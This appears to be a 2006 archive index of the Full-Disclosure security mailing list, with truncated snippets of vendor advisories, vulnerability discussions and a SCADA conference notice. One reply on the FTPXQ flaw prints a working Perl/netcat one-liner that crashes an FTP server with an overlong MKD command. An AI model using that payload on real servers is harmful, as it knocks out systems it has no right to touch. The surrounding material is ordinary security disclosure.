Re: [Full-disclosure] Putty Proxy login/password discolsure....

2006-10-26 Thread Robert Jaroszuk
Raj Mathur wrote: On Wednesday 25 October 2006 23:14, cardoso wrote: Exactly. A few years ago I used to deal with linux fanboys showing them the cute trick of linux single at boot time. After a few hours begging for the admin password, I teached the trick and they usually stopped the brag

[Full-disclosure] rPSA-2006-0198-1 screen

2006-10-26 Thread rPath Update Announcements
rPath Security Advisory: 2006-0198-1 Published: 2006-10-26 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: screen=/[EMAIL PROTECTED]:devel//1/4.0.3-0.1-1 References:

[Full-disclosure] rPSA-2006-0195-2 kdelibs qt-x11-free

2006-10-26 Thread rPath Update Announcements
rPath Security Advisory: 2006-0195-2 Published: 2006-10-18 Updated: 2006-10-26 Integer overflow now fixed in Qt library Products: rPath Linux 1 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: kdelibs=/[EMAIL

Re: [Full-disclosure] Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability

2006-10-26 Thread cdejrhymeswithgay
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Wed, 25 Oct 2006 04:30:18 -0500 Gadi Evron [EMAIL PROTECTED] wrote: Does anyone have more information on this issue? Yes. SecuriTeam is currently assisting a researcher with reporting this issue to Yahoo! security. Yahoo! security responded

Re: [Full-disclosure] Vulnerability automation and Botnet solutions I expect to see this year

2006-10-26 Thread cdejrhymeswithgay
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Tue, 24 Oct 2006 10:52:58 -0500 Gadi Evron [EMAIL PROTECTED] wrote: So, what I am going to talk about... A tad bit of history on vulnerabilities and their use on the Internet, and then, what we are going to see on corporate, ISP and Internet

Re: [Full-disclosure] Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability

2006-10-26 Thread Gadi Evron
On Thu, 26 Oct 2006 [EMAIL PROTECTED] wrote: So how fast is this record time? As fast as Hitler's Blitzkrieg tactics? That's pretty fast! Yahoo! released a fixed version. Gadi. ___ Full-Disclosure - We believe in it. Charter:

[Full-disclosure] S4: SCADA Security Scientific Symposium

2006-10-26 Thread rrushi
S4: SCADA Security Scientific Symposium Kovens Conference Center 3000 N.E. 151st Street Miami, FL 33181 Wednesday, Jan. 24, 2007 - Thursday, Jan. 25, 2007 8:30 AM - 5:00 PM A unique 2-day symposium with technical presentations on SCADA security research. Wednesday, January 24th Session 1:

Re: [Full-disclosure] [funsec] Who is n3td3v?

2006-10-26 Thread Bipin Gautam
So I stick to my personal opinion of the great man - 1. One person 2. Good intentions overall 3. Not great communication skills (depends how drunk he is) 4. Too paranoid for his own good 5. Living in Ediburgh 6. Most likely Scottish ok despite everything (assuming he isnt suffering from

Re: [Full-disclosure] FTPXQ Denial of service exploit.

2006-10-26 Thread Bernhard Mueller
Hello, And here's the bash/perl port: [EMAIL PROTECTED] ~ $ perl -e print USER lol\r\nPASS lol\r\nMKD .(Ax255).\r\n | nc www.victim.com 21 Cheers, Bernhard Federico Fazzi wrote: /* * 0xf_ftpxq.c - FTPXQ Denial of service exploit. * Federico Fazzi [EMAIL PROTECTED] * * advisory by Eric

[Full-disclosure] Exploiting integer overflows

2006-10-26 Thread Joxean Koret
Hello, I found various integer overflows that can be triggered from remote in a product but all of these appears to be unexploitables by common ways. The product is a closed source one so I do not have the source code to audit it. Any tip about when an integer overflow can be determined as non

[Full-disclosure] iDefense Security Advisory 10.26.06: Multiple Vendor wvWare LFO Count Integer Overflow Vulnerability

2006-10-26 Thread iDefense Labs
Multiple Vendor wvWare LFO Count Integer Overflow Vulnerability iDefense Security Advisory 10.26.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 26, 2006 I. BACKGROUND The WV library provides an interface to facilitate access to binary file format Microsoft Word documents. The

[Full-disclosure] iDefense Security Advisory 10.26.06: Multiple Vendor wvWare LVL Count Integer Overflow Vulnerability

2006-10-26 Thread iDefense Labs
Multiple Vendor wvWare LVL Count Integer Overflow Vulnerability iDefense Security Advisory 10.26.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 26, 2006 I. BACKGROUND The WV library provides an interface to facilitate access to binary file format Microsoft Word documents. The

[Full-disclosure] Authentication Issue DD-WRT

2006-10-26 Thread João Francisco
Hi, Does anyone noticed that to authenticate in any wireless router running DD-WRT firmware (lastest version), it only check the first 8 characters of the password??? E.g. you can set the root password to [EMAIL PROTECTED] and when you try to authenticate with [EMAIL PROTECTED]... got root! Some

[Full-disclosure] ZDI-06-035: Novell eDirectory NDS Server Host Header Buffer Overflow Vulnerability

2006-10-26 Thread zdi-disclosures
ZDI-06-035: Novell eDirectory NDS Server Host Header Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-035.html October 26, 2006 -- CVE ID: CVE-2006-5478 -- Affected Vendor: Novell -- Affected Products: Novell eDirectory 8.8.1 -- TippingPoint(TM) IPS

[Full-disclosure] [ GLSA 200610-13 ] Cheese Tracker: Buffer Overflow

2006-10-26 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200610-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - -